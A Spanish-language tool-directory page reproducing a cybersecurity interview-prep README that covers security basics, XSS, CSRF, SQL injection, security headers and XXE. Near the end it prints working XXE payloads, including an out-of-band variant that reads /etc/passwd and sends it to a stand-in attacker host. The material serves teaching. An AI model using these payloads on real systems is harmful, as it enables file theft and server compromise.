Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Interview_Tips — Resumen de preguntas de entrevistas de ciberseguridad por las que he pasado, espero que esto ayude | Kitploit
Herramientas/GitHubGitHub/jigerjain/interview_tips
Seguridad WebSeguridad de RedesCriptografíaSeguridad en la NubeAprendizaje y EducaciónRecursos CuradosRutas de Aprendizaje y CursosExplotación de Binarios
GitHubjigerjain/interview_tips

Interview_Tips

Resumen de preguntas de entrevistas de ciberseguridad por las que he pasado, espero que esto ayude

Ver Repositorio
691723hace 6 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Consejos para entrevistas (Seguridad de la Información)

Esta página es un resumen de las entrevistas por las que he pasado; cubrí una variedad considerable de roles, recibí múltiples rechazos, pero aprendí de cada entrevista, recopilé comentarios constructivos y seguí adelante. Espero que estas preguntas/consejos puedan ayudarte.

Los roles que cubre generalmente son los siguientes:

  • Prácticas en Ciberseguridad
  • Prácticas en Pruebas de Penetración / Red Team
  • Prácticas en Seguridad de Aplicaciones Web / Seguridad de Aplicaciones
  • Prácticas en Seguridad de Producto
  • Prácticas en Seguridad de Infraestructura

Consejo rápido:

  • Revisa tu currículum y hazte preguntas relacionadas con él de antemano
  • Si no conoces alguna pregunta/concepto, no le des vueltas al tema; comunica que podrías aprenderlo si se te da un entorno para trabajar
    No puedes saberlo todo; sé humilde al aceptar si respondiste algo mal o si necesitas aclaración
  • Prepara una breve biografía sobre ti de antemano para presentarte
  • Ten claro tu objetivo final y el porqué de infosec
  • Por último, pregunta por los comentarios al final de la entrevista, ¿por qué? Porque: ayuda a conocer y llenar los vacíos de tu conocimiento actual en infosec

He intentado anotar todas las preguntas posibles que he encontrado a continuación y he proporcionado respuestas para algunas. El resto puedes buscarlas en Google para obtener respuestas específicas y si quieres profundizar. Aparte de eso, hay algunas referencias al final, échales un vistazo. Fueron realmente útiles.

Me encantaría añadir más preguntas a medida que avance y revise mis notas; sin embargo, agradecería que me dieras una opinión constructiva contactándome a través de [email protected]. Si te encuentras con algo que no esté cubierto aquí, no dudes en compartirlo.

Preguntas comunes

  1. Tríadas de seguridad:

¿Qué es la tríada CIA?

  • Confidencialidad
  • Integridad
  • Disponibilidad

¿Qué es AAA?

  • Autenticación
  • Autorización
  • Contabilidad
  1. Diferencia entre amenaza, vulnerabilidad, exploits y riesgo, y cómo se relacionan con los activos
  • Amenaza:
    Una amenaza es aquello contra lo que intentamos protegernos
  • Vulnerabilidad:
    Una vulnerabilidad es una debilidad o brecha en nuestros esfuerzos de protección
  • Exploit:
    Un exploit es una capacidad/programa (puede ser un software o una habilidad de ingeniería social) que se ha desarrollado para atacar un activo aprovechando una vulnerabilidad
  • Riesgo:
    El riesgo es la intersección de activos, amenazas y vulnerabilidades
  • Activo:
    Un activo es lo que intentamos proteger
  1. ¿Qué es IAM y por qué se utiliza?
    IAM es la gestión de identidades y accesos, que se utiliza para segregar roles y responsabilidades dentro de una organización. Es una pieza crítica en la seguridad. Ayuda a mantener la seguridad y los privilegios a nivel de acceso

Seguridad en general

Fases de un ataque de intrusión a la red:

  • Reconocimiento / Recopilación de información
  • Obtener el acceso necesario
  • Mantener el acceso
  • Cubrir las huellas (eliminar registros, puertas traseras y ocultar todos los controles)

Seguridad en Aplicaciones Web

  1. Pregunta común:
  • OWASP Top 10

  • ¿Qué es XSS (Cross-site Scripting)?

    • Practica XSS en: [https://xss-game.appspot.com/]
    • Cómo combatir XSS: Brevemente, usa una validación de entrada adecuada
    • Busca la cabecera CSP (Content-Security-Policy)
    • Diferentes tipos de XSS: Reflejado, Almacenado y basado en DOM
    • ¿Cuáles son las fuentes y los sumideros en el DOM que pueden provocar XSS?
      [https://www.netsparker.com/blog/web-security/dom-based-cross-site-scripting-vulnerability/]
  • ¿Qué es CSRF? Esta es la pregunta más dulce que a cualquier entrevistador le encantaría hacer
    Consejo rápido: Sé breve; si te lo piden, solo entonces explica toda la historia

    Cross-Site Request Forgery (CSRF) es un ataque que obliga a un usuario final a ejecutar acciones no deseadas en una aplicación web en la que está autenticado actualmente. Los ataques CSRF apuntan específicamente a solicitudes que cambian el estado, no al robo de datos, ya que el atacante no tiene forma de ver la respuesta a la solicitud falsificada. Con un poco de ayuda de la ingeniería social (como enviar un enlace por correo electrónico o chat), un atacante puede engañar a los usuarios de una aplicación web para que ejecuten acciones elegidas por el atacante. Si la víctima es un usuario normal, un ataque CSRF exitoso puede obligar al usuario a realizar solicitudes que cambian el estado, como transferir fondos, cambiar su dirección de correo electrónico, etc. Si la víctima es una cuenta administrativa, el CSRF puede comprometer toda la aplicación web.

  • Cómo combatir CSRF:
    Usa tokens Anti-CSRF
    Usa la política de mismo origen (same-origin policy)
    Uso de la cabecera Referrer

  • ¿Qué es la codificación HTML/URL?

  • ¿Es el protocolo HTTP sin estado?
    HTTP es inherentemente un protocolo sin estado; sin embargo, el servidor utiliza cookies para hacerlo con estado

  • ¿Cuáles son los tipos de inyecciones: SQL, Comandos, SO?

  • Cómo combatir las inyecciones SQL:
    Usa consultas parametrizadas y procedimientos almacenados

  1. Revisa las cabeceras que ayudan a proporcionar seguridad (Revisa las URLs y lee el contenido; te ayudará a construir tus fundamentos):
  • CSP (Content-Security Policy) [https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy]
    [https://www.html5rocks.com/en/tutorials/security/content-security-policy/]
  • CORS (Cross-Origin Resource Sharing) [https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS]
  • Same-Origin policy [https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy]
  1. Hay escenarios poco frecuentes en los que un entrevistador preguntaría esto; me los encontré en etapas posteriores de algunas entrevistas y pensé en mencionarlos:
  • ¿Qué es XXE (XML External Entities)?
    La inyección de entidades externas XML (también conocida como XXE) es una vulnerabilidad de seguridad web que permite a un atacante interferir con el procesamiento de datos XML de una aplicación. A menudo permite a un atacante ver archivos en el sistema de archivos del servidor de aplicaciones e interactuar con cualquier sistema backend o externo al que la propia aplicación pueda acceder.
    Échale un vistazo a [https://portswigger.net/web-security/xxe]
    Ejemplo:
    <?xml version="1.0" encoding="UTF-8"?>    
    <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>     
    <stockCheck><productId>&xxe;</productId></stockCheck> 
    
    En algunas situaciones, un atacante puede escalar un ataque XXE para comprometer el servidor subyacente u otra infraestructura backend, aprovechando la vulnerabilidad XXE para realizar ataques de falsificación de solicitudes del lado del servidor (SSRF).
  • Out-Of-Band: usando entidades XML, los datos del servidor pueden ser capturados y enviados a hacker.com (no se requiere salida del servidor)

Para inyectar: document.xml

<!DOCTYPE root [
    <!ENTITY % remote SYSTEM "http://hacker.com/evil.dtd">
    %remote; %intern; %xxe;
]>
<root>&xxe;</root> - you can change xxe entity to general entity

Host externo: http://hacker.com/evil.dtd

<!ENTITY % payl SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/passwd">
<!ENTITY % intern "<!ENTITY &#37; xxe SYSTEM 'http://hacker.com/result-is?%payl;'>">
                    --- OR ---
<!ENTITY % intern "<!ENTITY &#37; xxe SYSTEM 'file://%payl;'>"> - consider error-based

Ref: [https://phonexicum.github.io/infosec/xxe.html]

Descargar herramienta